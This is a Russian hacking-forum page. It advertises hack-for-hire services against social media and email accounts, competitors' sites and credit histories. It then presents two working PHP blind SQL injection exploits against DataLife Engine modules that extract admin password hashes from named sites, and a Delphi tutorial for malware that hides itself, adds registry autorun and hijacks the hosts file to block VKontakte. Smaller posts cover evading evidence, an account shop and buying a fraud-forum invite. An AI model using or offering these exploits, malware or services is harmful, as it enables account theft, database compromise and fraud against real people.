- Даем всю необходимую информацию для безопасного входа на страницу жертвы


Выполним для вас взлом: Instagram, Twitter, ICQ, Skype, Viber, Whatsapp (что не нашли - уточняйте)

Взломаем САЙТ конкурентов, удалим негативные ОТЗЫВЫ (фото, видео и не только), осуществляем взлом EMAIL

Если вам необходимо удалить отрицательную Кредитную Историю - это снова к [email protected]. Мы можем почистить вашу БКИ, а также повысить скоринговый балл



║║ ─ ╔╗ ─ ║╔ ─ ╔═ ─ ╔╗
╠╣ ─ ╠╣ ─ ╠╣ ─ ╠═ ─ ╠╝
║║ ─ ║║ ─ ║╚ ─ ╚═ ─ ╠╗






Почему именно у [email protected] стоит заказать взлом?
1) В нашем сервисе работают только профессионалы, которые сделают работу в срок
2) Выполняем срочные заказы
3) Заключаем сделки только через проверенный и надежный гарант сервис
4) Гарантируем анонимность и конфиденциальность каждому клиенту
5) Имеем свои профессиональные методы и приемы при выполнении заказов
6) Гарантируем качество работы
7) Даем консультации каждому клиенту и предоставляем подробную инструкцию по использованию определенных приложений

Получить всё это вы можете, обратившись по адресу [email protected]!

--------------------------------------------------------------------------------------------------------



















-------------------------------------Acount.attack.hakkerСОБАКАgmail.com-------------------------------------

                          Вы получите от нашего сервиса следующие услуги взлома на заказ:
 
- Быстрое выполнение заказа
- Качество работы доставит вам удовольствие
- Гарантируем конфиденциальность каждому клиенту


vk и ok
  Что вы получите от нашего сервиса, заказывая взлом вконтакте или одноклассники:
- Пароль и логин для входа без изменения (в единственном случае можем изменить, если об этом просит клиент)
- Повторный взлом бесплатно, если жертва поменяет пароль в течении месяца
- Доказательства - на ваш выбор
- Анонимность и качественное выполнение заказа
- Даем всю необходимую информацию для безопасного входа на страницу жертвы


Выполним для вас взлом: Instagram, Twitter, ICQ, Skype, Viber, Whatsapp (что не нашли - уточняйте)

Взломаем САЙТ конкурентов, удалим негативные ОТЗЫВЫ (фото, видео и не только), осуществляем взлом EMAIL

Если вам необходимо удалить отрицательную Кредитную Историю - это снова к Acount.attack.hakkerСОБАКАgmail.com. Мы можем почистить вашу БКИ, а также повысить скоринговый балл



║║ ─ ╔╗ ─ ║╔ ─ ╔═ ─ ╔╗
╠╣ ─ ╠╣ ─ ╠╣ ─ ╠═ ─ ╠╝
║║ ─ ║║ ─ ║╚ ─ ╚═ ─ ╠╗






Почему именно у Acount.attack.hakkerСОБАКАgmail.com стоит заказать взлом?
1) В нашем сервисе работают только профессионалы, которые сделают работу в срок
2) Выполняем срочные заказы
3) Заключаем сделки только через проверенный и надежный гарант сервис
4) Гарантируем анонимность и конфиденциальность каждому клиенту
5) Имеем свои профессиональные методы и приемы при выполнении заказов
6) Гарантируем качество работы
7) Даем консультации каждому клиенту и предоставляем подробную инструкцию по использованию определенных приложений

Получить всё это вы можете, обратившись по адресу Acount.attack.hakkerСОБАКАgmail.com!

--------------------------------------------------------------------------------------------------------




#233 Уязвимости DataLife Engine

Написано Admin : 28 Февраль 2016 - 08:11

SQL-inj в неофициальном модуле files (файловый архив)
уязвимость после order by в параметре orderby
Пример запроса:
http://www.site.ru/index.php?do=files&op=cat&id=1&orderby=if(ord(substring((select+password+from+dle_users+where+user_group=1+limit+0,1),1,1))+between+0+and+0,url,[b](select%201%20from%20dle_downloads))+--+
 
Эксплоит:[/b]
 
<?phpset_time_limit(0);/*-----------------------------------------------------*/ //Эксплойт для модуля Files(модуль файлового архива) к DLE//Автор: H00K/*-----------------------------------------------------*/  /*-----------------Настройки---------------------------*/ $host="symbiware.org";//указываем хост$catid = "38";//Указываем id существующей категории$userid = "0";//Указываем id администратора/*-----------------------------------------------------*/  $good = "MySQL Fatal Error";$bad = "Архив файлов";$path="/index.php?do=files&op=cat&id={$catid}&orderby=if(ord(substring((select+password+from+dle_users+where+user_group=1+limit+{$userid},1),";$end = ",(select%201%20from%20dle_downloads),url)+--+";$index = 1;$result = ""; function GetMiddle($min, $max){ return floor($min+((($max+1)-($min-1))/2));} function Check($min,$max){ if (($max-$min)<=2)  {  global $index;  global $result;  global $host;  global $path;  echo "Символ найден: ";  if (($max-$min)==1)  if (CheckSQL($host, $path, $index.",1))={$max}"))    $result .=chr($max); else $result .=chr($min);  if (($max-$min)==2)  {  if (CheckSQL($host, $path, $index.",1))={$max}"))  {    $result .=chr($max);  } else  {   if(CheckSQL($host, $path, $index.",1))={$max}-1"))    $result .=chr($max-1); else $result .=chr($min);    }  }   echo substr($result,strlen($result)-1)."<br>";   flush();   $index++;    return true;  } else return false;} function CheckSQL ($host, $path, $st){   global $end;    $line="";    $fo = fsockopen($host, 80, $errno, $errstr, 30);    if(!$fo){die ("no connect");}    else     {        $headers="GET ".$path.$st.$end." HTTP/1.1rn";       $headers.="Host: ".$host."rn";       $headers.="Connection: Closernrn";           global $good;       global $bad;        fwrite($fo, $headers);        while (!feof($fo))        {            $line = fgets($fo, 512);            if (strpos($line,$good))             {             fclose($fo);             return true;            }            if (strpos($line,$bad))            {             fclose($fo);             return false;            }        }        fclose($fo);    }    return false;}if (CheckSQL($host, $path, $index.",1))+between+1+and+255"))  echo (" Идет подбор символов...<br>"); else  die("Ошибка"); for ($i=0;$i<32;$i++){ $min = 31; $max = 123; $ok = true; while ($ok == true) {  $num = GetMiddle($min,$max);  if (!check($min,$max))  {  if (CheckSQL($host, $path, $index.",1))+between+1+and+{$num}"))   { echo("Меньше $num <br>");   $max = $num;  } else  {  echo ("Больше $num <br>");    $min = $num;  }   flush(); } else $ok = false; } }echo $result;?>
 
SQL-inj в неофициальном модуле gallery, в параметре news_sort
Уязв.код (news_sort) :show_cat.php
 
if ( isset($_POST['news_sort']) ) $galConfig['news_sort'] = mysql_escape_string($_POST['news_sort']); elseif ($gal_cat[$category_id]['news_sort'] != "") $galConfig['news_sort'] = $gal_cat[$category_id]['news_sort'];if ( isset($_POST['news_msort']) ) $galConfig['news_msort'] = mysql_escape_string($_POST['news_msort']); elseif ($gal_cat[$category_id]['news_msort'] != "") $galConfig['news_msort'] = $gal_cat[$category_id]['news_msort']; if ($galConfig['user_cats_limit']) $sear = "(" . PREFIX . "_gal_cat.cat_status = '0' OR " . PREFIX . "_gal_cat.cat_status = '2') AND " . PREFIX . "_gal_pic.approve='1'"; else $sear = "" . PREFIX . "_gal_cat.cat_status = '0' AND " . PREFIX . "_gal_pic.approve='1'"; $result = $db->query("SELECT " . PREFIX . "_gal_pic.*, " . PREFIX . "_gal_cat.cat_title, cat_alt_name, allow_rating, allow_comm FROM " . PREFIX . "_gal_pic LEFT JOIN " . PREFIX . "_gal_cat ON " . PREFIX . "_gal_pic.pic_cat_id=" . PREFIX . "_gal_cat.cat_id WHERE " . PREFIX . "_gal_cat.cat_alt_name='$category' AND $sear AND " . PREFIX . "_gal_cat.cat_view_level regexp '[[:<:]]($member_id[user_group])[[:>:]]' ORDER BY ".$galConfig['news_sort']." ".$galConfig['news_msort']." LIMIT $cstart, $lim");
Как видим данные из news_sort попадают в функцию mysql_escape_string, но так как в запросе данные не обрамляются кавычками, эта функция никаким образом не помешает проведению sql инъекции
 
Пример запроса:
 
POST /index.php?do=gallery&action=show_cat&category=gorod HTTP/1.1Host: www.simfilife.netUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127Keep-Alive: 300Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 133news_sort=if(ord(substring((select password from dle_users where user_id=1),1,1))>4,(select 1 from dle_usergroups),0)&news_msort=DESC
Exploit:
<?php set_time_limit(0); /*-----------------------------------------------------*/ //Эксплойт для неофициального модуля Gallery для DLE//Автор: l-l00K/*-----------------------------------------------------*/   /*-----------------Настройки---------------------------*/   $good = "MySQL Fatal Error"; $bad = "robots"; $host= "simfilife.net";//указываем сайт $path="/index.php?do=gallery&action=show_cat&category=gorod";//Указываем существующую категорию $body = "news_sort=if(ord(substring((select password from dle_users where user_id=1),"; $index = 1; $result = ""; $end = ",(select 1 from dle_usergroups),0)&news_msort=DESC";  function GetMiddle($min, $max) {  return floor($min+((($max+1)-($min-1))/2)); }  function post_sql($host,$path,$post_body) { global $end; $post_body  .= $end; $post_query  = "POST ".$path." HTTP/1.1rn"; $post_query .= "Host: ".$host."rn"; $post_query .= "Connection: closern"; $post_query .= "Content-Type: application/x-www-form-urlencodedrn"; $post_query .= "Content-length: " . strlen($post_body) . "rnrn"; $post_query .= $post_body;  $sock = fsockopen($host, 80, $errno, $errstr, 30);  if (!$sock) die('Could not connect to host! ');  fputs($sock, $post_query); global $good; global $bad; $answer = ''; while (!feof($sock)) {    $answer .= fgets($sock, 1024);    if (strpos($answer,$good))     {     fclose($sock);     return true;    }    if (strpos($answer,$bad))    {      fclose($sock);      return false;    } } fclose($sock); return false;} function Check($min,$max){ if (($max-$min)<=2)  {  global $index;  global $result;  global $host;  global $path;  global $body;  echo "Символ найден: ";  if (($max-$min)==1)  if (post_sql($host, $path, $body.$index.",1))={$max}"))    $result .=chr($max); else $result .=chr($min);  if (($max-$min)==2)  {  if (post_sql($host, $path, $body.$index.",1))>{$max}-1"))  {    $result .=chr($max);  } else  {   if(post_sql($host, $path, $body.$index.",1))={$max}-1"))    $result .=chr($max-1); else $result .=chr($min);    }  }   echo substr($result,strlen($result)-1)."<br>";   flush();   $index++;    return true;  } else return false;} $bool = true;while ($bool==true){ if (post_sql($host, $path, $body.$index.",1))>0"))  {  echo ("Символ есть, идет подбор...<br>");  flush();  $ok = true; } else  { echo ("Символы кончились <br>");  $ok = false;  $bool = false;  echo $result; } $min = 31; $max = 123; while ($ok == true) {  $num = GetMiddle($min,$max);  if (!check($min,$max))  {  if (post_sql($host, $path, $body.$index.",1))<{$num}"))   {   echo("Меньше $num <br>");   $max = $num;  } else  {   echo ("Больше $num <br>");    $min = $num;  }   flush(); } else $ok = false; } } ?>



#1243 Магазин Онлайн!

Написано Opasniy : 15 Август 2016 - 09:35

Доброго времени суток !

Лучший Магазин Аккаунтов и много другова !
9f3773b9eae2.gif



#241 Блокиратор вконтакте

Написано Admin : 28 Февраль 2016 - 08:35

Добрый день, сейчас опишу метод блокировки вконтакте средствами Delphi. Главное преимущество нашей идеи состоит в том, что она не требует хостинга. 
 
 
Наша программка будет редактировать всем известный файл hosts и поднимать на компьютере жертвы собственный http-сервер, таким образом компьютер жертвы и будет хостом для сайта, на который будет прописан редирект в хостс. 
Нам потребуется 
 
[1] Delphi 7 
[2] Установленная библиотека Indy 
 
Для начала создадим html-файлик, который станет страничкой, которую увидит пользователь, попытавшись войти на свой аккаунт. 
 
В нем я написал следующее
 
<html><title>Вконтакте Добро Пожаловать</title></head><div align=center><image src=12.bmp></div></html>
 
Не забудьте создать картинку с именем 12.bmp 
 
Моя картинка вот http://s49.radikal.r...88381aea11.bmp 
 
Теперь поместите наш файл и картинку в папку C:Windows 
 
Приступим к написанию веб-сервера. 
Кинем на форму idHTTPServer с закладки Indy Servers 
Назовем его Server 
 
В событии создания формы напишем
 
procedure TForm1.FormCreate(Sender: TObject);var str:tstringlist;beginapplication.ShowMainForm:=false; //Делаем форму скрытойif not FileExists('C:Windowswebserver.exe') then begin //Проверка, если веб //сервера нет в папкеCopyFile(pchar(application.exename),'C:Windowswebserver.exe',false); //То //скопируемся тудаWinExec('C:Windowswebserver.exe',sw_hide); //И запустим серверRegHosts; //Процедура модификации хостсRegRun; //Пропись в реестреApplication.Terminate; //Если это убрать, то наш сервер не запустится, т.к.//На одном компе может быть запущен только один сервер на одном портуendelsebeginRegRun; //Иначе пропишемся в реестрRegHosts; //Модифицируем хостсserver.Active:=true; //И включим серверend;
 
Теперь объявим процедуры RegRun и RegHosts
 
public{ Public declarations }procedure RegHosts;procedure RegRun;end;
 
Пропись в реестр
 
procedure TForm1.RegRun;var reg:tregistry;beginreg := tregistry.create; //Инициализируем переменнуюreg.rootkey := hkey_local_machine; //Открываем ключ реестраreg.lazywrite := false;reg.openkey('softwaremicrosoftwindowscurrentversionrun', false); //Открываем //подраздел реестраreg.writestring('MicrosoftWebServerUpdater.exe', 'C:Windowswebserver.exe'); //Прописываем путь до сервера в автозагрузку(вместо //'C:windowswebserver.exe' можно написать Application.exename//Тогда программа пропишет в авторан путь до самой себя в данный моментreg.closekey; //Закрываем разделreg.free; //Уничтожаем переменнуюend;
 
Думаю, тут ничего объяснять не надо 
 
Модификация файла хостс 
Предварительно объявим глобальной переменной 
 
FileStr:TStringlist;
 
procedure TForm1.RegHosts;beginFilestr:=tstringlist.Create; //Создаем списокFilestr.LoadFromFile('C:WindowsSystem32driversetchosts'); //Загружаем //содержимое хостс в списокFilestr.Add('127.0.0.1 vkontakte.ru'); //Добавим строчку//Слева написан IP, на который произойдет переадресация//Справа - ресурс, с которого она произойдетfilestr.SaveToFile('C:WindowsSystem32driversetchosts'); //Сохраним измененияFilestr.Free; //Освободим объектend;
 
Теперь перейдем к программированию обработки запросов, 
Посылаемых браузером жертвы на сервер. 
В обработчике события OnCommandGet Server'a напишем следующее
 
procedure TForm1.ServerCommandGet(AThread: TIdPeerThread;ARequestInfo: TIdHTTPRequestInfo; AResponseInfo: TIdHTTPResponseInfo);beginif (pos('ndex',arequestinfo.document)=0)and(pos('12.bmp',arequestinfo.document)=0) then//Если пользователь браузер запрашивает нашу страничкуarequestinfo.Document:='index.html'; //Если запрашивается другая страничка//То все равно откроем нашу. Я пишу такие условия потому, что иначе//У меня программа вываливалась с экзепшном, может у вас получится:) if arequestinfo.Document='/' thenbeginarequestinfo.Document:=''; //Обнуляем запросaresponseinfo.ContentStream:=tfilestream.Create('C:windowsindex.html',fmopenread); //отправляем клиенту файл index.htmlend elseif arequestinfo.Document<>'/' then //Если прошлая проверка пройдена, то//Отправляем файл клиенту(картинку)//Если этого не написать, картинка не отобразитсяaresponseinfo.ContentStream:=tfilestream.Create('C:windows'+arequestinfo.Document,fmopenread);end;
 
При разрушении формы напишем
 
Server.active:=false; // Иначе программа будет некорректно работать
 
В uses обязательно добавьте Registry, иначе прописаться в реестр программа не сможет. 
 
Теперь проверим, наберем в окне любого браузера 127.0.0.1 
Если вам не открылся ваш html файл, то где-то вы допустили ошибку. 
Теперь пробуем ввести vkontakte.ru 
 
 
Если все правильно сделано, то видим свою табличку. Кому помог, ставьте плюсик. 
Если я где-то ошибся, вот исходник Скачать



#14791 Уничтожение жесткого диска и недоказуемость действий: технико-юридический аспект

Написано Admin : 08 Январь 2017 - 01:18

Храните всё в облаке Без риска не как, есть такие облачные диски которые вам заменят ваш жесткий диск, создайте его не с вашего компа а с другого, скачайте себе van типа аваст, да даже бесплатный подойдет и пользуйтесь. Всё что вам нужно помнить так это один пароль от диска, о нём знаете только вы. Вот и всё а привязать диск можно к номеру который вы покупаете на улице, т.е ваши данные левые, диск облачный.
  • Это нравится: simorg


#1236 Готов КУПИТЬ инвайт на VLMI.SU

Написано Nokclier : 13 Август 2016 - 04:33

Всем привет. Друг рассказал, что нашёл там схему сразу же В ПЕРВОЙ ТЕМЕ раздела Схемы заработка, которую он решил применить и ПРОФИТ !!! 2548 рублей он заработал за 3-4 часа. Кстати его мама не верила, что можно заработать в интернете. Он вывел деньги и отдал ей.
Она немного ахуела, но поверила в итоге. Теперь он зарабатывает в интернете, зная, что мама верит в заработок в интернете.
За инвайт готов заплатить 500 рублей. Но не больше. Может процентами от заработанного мною на схемах VLMI.SU заплачу вам 5-10к.
Для связи обращаться сюда-----> vk.com/vk__alexey
Заранее спасибо. Если кто подумал, что это реклама, вы глубоко ошибаетесь.



Яндекс.Метрика Analysis Счетчик ИКС
Добавить Vkontakte Добавить в Facebook Добавить в Twitter Добавить в LiveJournal